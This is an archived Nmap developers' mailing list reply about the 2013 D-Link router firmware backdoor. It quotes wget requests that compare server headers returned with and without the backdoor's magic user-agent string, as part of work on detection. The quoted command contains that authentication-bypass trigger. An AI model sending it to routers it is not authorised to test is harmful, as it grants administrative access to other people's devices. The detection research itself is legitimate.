Nmap Development mailing list archives
Re: D-Link firmware backdoor
From: Michael Meyer <michael.meyer () greenbone net>
Date: Wed, 16 Oct 2013 15:10:06 +0200
*** David Maynor wrote:
These are done against the same IP, only difference is the user agent: Davids-Mac-mini:dlink_scan dave$ wget -S --user-agent="xmlset_roodkcableoj28840ybtide" http://xxx.xxx.xxx.xxx
[...]
Server: Alpha_webserv
[...]
Davids-Mac-mini:dlink_scan dave$ wget -S http://xxx.xxx.xxx.xxx
[...]
Server: thttpd-alphanetworks/2.23
Yes, i've seen this behaviour. But for example the 'DIR-100' has 'Server: Alpha_webserv' in both cases. Micha -- Michael Meyer OpenPGP Key: 52A6EFA6 http://www.greenbone.net/ Greenbone Networks GmbH, Neuer Graben 17, 49074 Osnabrück | AG Osnabrück, HR B 202460 Geschäftsführer: Lukas Grunwald, Dr. Jan-Oliver Wagner _______________________________________________ Sent through the dev mailing list http://nmap.org/mailman/listinfo/dev Archived at http://seclists.org/nmap-dev/
Current thread:
- D-Link firmware backdoor Patrik Karlsson (Oct 15)
- Re: D-Link firmware backdoor Michael Meyer (Oct 16)
- Re: D-Link firmware backdoor David Maynor (Oct 16)
- Re: D-Link firmware backdoor Michael Meyer (Oct 16)
- Re: D-Link firmware backdoor Patrik Karlsson (Oct 16)
- Re: D-Link firmware backdoor Patrik Karlsson (Oct 17)
- Re: D-Link firmware backdoor David Maynor (Oct 16)
- Re: D-Link firmware backdoor Michael Meyer (Oct 16)